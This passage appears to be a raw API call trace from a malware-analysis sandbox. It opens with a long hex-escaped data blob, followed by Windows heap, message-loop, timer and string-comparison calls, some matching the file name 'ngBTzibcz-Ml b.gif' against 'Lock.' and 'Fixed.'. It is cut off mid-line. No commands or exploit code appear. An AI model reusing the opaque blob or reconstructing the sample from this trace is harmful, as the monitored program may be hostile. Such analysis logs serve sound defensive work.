x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0205.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0205.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0205.823] TranslateMessage (lpMsg=0x8bf970) returned 0 [0205.823] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0205.823] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0205.823] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0205.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0205.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0205.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0205.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ngBTzibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gBTzibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTzibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tzibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ibcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bcz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cz-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ml b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0205.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0205.825] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0205.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0205.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0205.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f170 [0205.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ngBTzibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gBTzibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTzibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tzibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ibcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bcz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cz-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ml b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0205.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36c0 [0205.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0205.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0205.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0205.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0205.831] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0205.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0205.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0205.831] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0205.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0205.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: 